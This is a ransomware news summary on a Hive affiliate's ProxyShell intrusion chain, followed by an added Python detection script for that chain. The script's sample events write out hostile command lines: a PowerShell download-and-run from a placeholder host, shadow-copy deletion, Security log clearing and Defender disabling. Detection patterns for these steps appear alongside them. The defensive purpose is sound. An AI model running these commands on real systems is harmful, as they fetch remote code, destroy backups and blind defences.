Hive ransomware affiliate exploits vulnerable Microsoft Exchange servers

Microsoft Exchange servers left unpatched against the ProxyShell security vulnerabilities are being attacked by an affiliate of the Hive ransomware group to distribute the Cobalt Strike beacon and other backdoors, reports BleepingComputer. Varonis researchers found that the Hive affiliate exploited the ProxyShell flaws, for which patches were issued in May, then deployed four web shells in an Exchange directory and ran PowerShell code to download Cobalt Strike stagers. The Mimikatz credential stealer was then used to exfiltrate domain admin account passwords, enabling lateral movement and broader access to network assets, the report revealed. The attackers then conducted extensive reconnaissance to identify valuable data, as evidenced by network scanners, device and directory enumeration, IP address lists, and SQL database scans. The report also detailed that file exfiltration was followed by execution of the Golang-based ransomware payload, named "Windows.exe," which erased shadow copies and Windows event logs and disabled Windows Defender before encrypting files.
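The chain above (web shell under the Exchange IIS worker, PowerShell stager download, then shadow-copy deletion, event-log clearing and Defender tampering right before encryption) is a sequence a detection engineer can score per host. The following is an added example written for this page, not code from Varonis, Microsoft or SC Media: it runs a handful of command-line rules over process-creation events and escalates hosts that exhibit more than one stage. The event format, hostnames and every sample command line are constructed; the `RULES`, `classify`, `detect` and `escalate` names are the example's own.

```python
"""Stage-based detection for the Hive post-exploitation chain described above.

Editor-added example. The event schema and all sample command lines are
constructed for illustration and are not taken from the Varonis report.
"""
import re
from collections import defaultdict

# Each rule: (stage name, regex applied to the lower-cased command line).
# Stages mirror the article: stager download, shadow-copy destruction,
# event-log clearing and Defender tampering before encryption.
RULES = [
    ("stager_download",
     re.compile(r"powershell.*(downloadstring|downloadfile|invoke-webrequest|\biex\b|invoke-expression)")),
    ("shadow_copy_deletion",
     re.compile(r"vssadmin.*delete.*shadows|wmic.*shadowcopy.*delete")),
    ("event_log_clearing",
     re.compile(r"wevtutil.*\bcl\b|clear-eventlog")),
    ("defender_tampering",
     re.compile(r"set-mppreference.*-disable")),
]

# The IIS worker process hosts Exchange's web front end; it spawning a shell is
# the classic footprint of a web shell such as the four the article mentions.
WEB_SERVER_PARENTS = {"w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def classify(event):
    """Return the stage names a single event matches (possibly none)."""
    stages = []
    if event["parent"].lower() in WEB_SERVER_PARENTS and event["image"].lower() in SHELLS:
        stages.append("web_shell_command")
    cmd = event["cmdline"].lower()
    for stage, pattern in RULES:
        if pattern.search(cmd):
            stages.append(stage)
    return stages


def detect(events):
    """Map each host to the stages observed, in order of first sighting."""
    per_host = defaultdict(list)
    for ev in events:
        for stage in classify(ev):
            if stage not in per_host[ev["host"]]:
                per_host[ev["host"]].append(stage)
    return dict(per_host)


def escalate(per_host, threshold=2):
    """Hosts showing several stages of the chain warrant an incident, not a ticket."""
    return sorted(h for h, stages in per_host.items() if len(stages) >= threshold)


# Constructed sample events (hypothetical hosts; "Windows.exe" is the payload
# name from the article, used here as the parent of its cleanup commands).
SAMPLE_EVENTS = [
    {"host": "EXCH01", "parent": "w3wp.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"host": "EXCH01", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -nop -w hidden IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"},
    {"host": "FS02", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"host": "FS02", "parent": "Windows.exe", "image": "vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "FS02", "parent": "Windows.exe", "image": "wevtutil.exe",
     "cmdline": "wevtutil cl Security"},
    {"host": "WS07", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell Get-ChildItem C:\\Users"},
]

if __name__ == "__main__":
    findings = detect(SAMPLE_EVENTS)
    for host, stages in findings.items():
        print(host, "->", ", ".join(stages))
    print("escalate:", escalate(findings))
```

Run as-is, the script flags EXCH01 (web shell command plus stager download) and FS02 (Defender tampering, shadow-copy deletion, event-log clearing) while the benign PowerShell on WS07 matches nothing. The per-host ordering is the point: a single `vssadmin` hit is noisy on its own, but the same host also clearing event logs and disabling Defender is the pre-encryption pattern the article describes, so `escalate` keys on stage count rather than any one rule.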
